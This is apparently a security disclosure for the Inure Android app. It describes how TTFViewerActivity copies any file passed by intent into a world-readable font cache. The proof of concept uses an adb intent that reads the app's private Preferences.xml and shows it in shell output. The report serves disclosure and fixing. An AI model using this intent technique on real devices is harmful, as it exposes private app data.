Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt

Description

Through the use of Oversecured, leading vulnerability scanner for Android and iOS applications, we were able to detect anTheft of Arbitrary Files vulnerability within TTFViewerActivity.kt. Check full issue definition in the image below:

Root Cause Analysis

The TTFViewerActivity failed to adequately validate the incoming intent.data prior to forwarding it to the openInputStream function, creating a potential vulnerability for accessing arbitrary files. For instance, an opportunity existed to utilize content:// data using the Inure application’s file provider scheme, thereby enabling the extraction of files from its internal directory.

Extraction of the opened files was facilitated by their storage in a directory that was publicly accessible. This was due to the fact that the activity utilized context.getExternalFilesDir to save the files in that location.

This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:

Proof of Concept

Access your device shell using adb shell then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache in order to examine the contents of the directory. For now it’s empty:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 6  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..

Send the following intent:

adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"

Review the font_cache directory again and notice that the Preference.xml was saved:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 10  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..  
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml 
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<boolean name="dont_show_again" value="true" />  
<int name="main_app_launch_count" value="13" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<int name="notes_list_type" value="0" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<long name="crash_timestamp" value="-1" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $